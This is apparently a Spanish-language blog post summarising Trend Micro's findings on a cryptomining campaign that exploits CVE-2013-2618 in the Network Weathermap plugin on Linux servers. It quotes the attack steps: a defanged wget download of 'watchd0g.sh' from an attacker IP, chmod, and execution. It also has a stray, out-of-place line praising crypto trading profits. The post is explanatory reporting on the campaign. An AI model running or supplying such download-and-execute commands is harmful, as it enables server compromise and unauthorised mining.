Una falla de Linux de 5 años permite a los atacantes minar criptomonedas

fallo linux

Esto de la minera de las criptomonedas con el uso de equipos remotos sin la autorización de los dueños de estos se esta convirtiendo en una tendencia. Ya había hablado sobre esto en algunas ocasiones aquí en el blog sobre este tipo de situación.

Y es que esto ya se ha salido de control totalmente desde el momento en que las criptomonedas han tomado un lugar y valor bastante considerable, personas con los conocimientos suficientes para acceder a equipos vulnerando su seguridad han dejado de lado el perder el tiempo en buscar información importante o cuentas de banco para obtener un beneficio monetario.

En vez de hace esto optan por lo mas sencillo en tomar el control de estos equipos y unirlos en una red de minería y además para otras tareas que comúnmente hacen con una botnet.

De esta forma suele ser más renumerarte, pues solo se están centrando en el dinero instantáneo que esto genera.

Con la comprensión inteligente de las tendencias del mercado y el conocimiento adecuado de cripto comercio, uno puede cosechar grandes beneficios.

¿Es Linux realmente un sistema seguro?

Muchos tenemos la idea de que Linux es un sistema operativo seguro casi perfecto, la realidad es que todavía tiene algunos defectos.

Pues hace algunos días TrendMicro realizo un hallazgo, en el cual reveló un nuevo defecto en los sistemas Linux que dio a los hackers la ventaja de extraer criptomonedas usando los servidores y máquinas Linux.

En un comunicado a través de su blog comentaron lo siguiente:

A través de nuestro monitoreo relacionado con la respuesta a incidentes, observamos intentos de intrusión cuyos indicadores pudimos correlacionar con una campaña anterior de minería de criptomoneda que utilizó el malware JenkinsMiner.

La diferencia: esta campaña se dirige a servidores Linux. También es un caso clásico de vulnerabilidades reutilizadas, ya que explota una falla de seguridad obsoleta cuyo parche ha estado disponible durante casi cinco años.

En este comunicado mediante su análisis lograron identificar los sitios afectados por este fallo que afecta principalmente a Japón, Taiwán, China, EE. UU y la India.

Análisis del ataque

Mediante el análisis por parte de Smart Protection Network de Trend Micro detallan un poco en como los atacantes se aprovechan de este fallo:

Los operadores de esta campaña estaban explotando CVE-2013-2618 , una vulnerabilidad fechada en el plugin Camapi Network Weathermap, que los administradores del sistema usan para visualizar la actividad de la red.

En cuanto a por qué están explotando un viejo defecto de seguridad: Network Weathermap solo tiene dos vulnerabilidades reportadas públicamente hasta el momento, ambas desde junio de 2014.

Es posible que estos atacantes estén aprovechando no solo una falla de seguridad para la cual un exploit está disponible sino también del retraso de parches que ocurre en las organizaciones que usan la herramienta de código abierto.

Básicamente el ataque es mediante un ataque XSS:

weathermap-cryptominer-4

La parte borrosa es el objetivo de ataque, un servidor web con un puerto .

El archivo /plugins/weathermap/configs/conn.php es el archivo resultante del ataque persistente XSS en /plugins/weathermap /php .

Además de conn.php inicial, observamos una solicitud HTTP similar que se aplica a una página llamada ‘ cools.php ‘.

El programa para minar criptomonedas es distribuido a través de la vulnerabilidad del mapa meteorológico de PHP en los objetivos que son servidores de Linux

En la imagen se puede apreciar cómo se genera el ataque y se describe del siguiente modo:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Lo que hace es mandar la indicación de descargar un archivo con wget la cual es una utilidad que casi todas las distribuciones de Linux tienen instalada por defecto

chmod 775 watchd0g.sh

hace que el archivo sea ejecutable

./watchd0g.sh

Lo que hace finalmente, es que el archivo se ejecute en el servidor.

Afortunadamente, ya hay un parche ( CVE-2013-2618 ) disponible para la falla y puedes descargarlo desde este enlace.

Si quieres conocer mas al respecto de este fallo puedes visitar este enlace.

Fuente: Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

 

Telegram @Entreverao

Anuncios

Autor: Entreverao

Una propuesta de gestión comunicacional en construcción colectiva, sistemica y tecnopolitca *canal https://telegram.me/Entreverao https://twitter.com/ENTREVERA0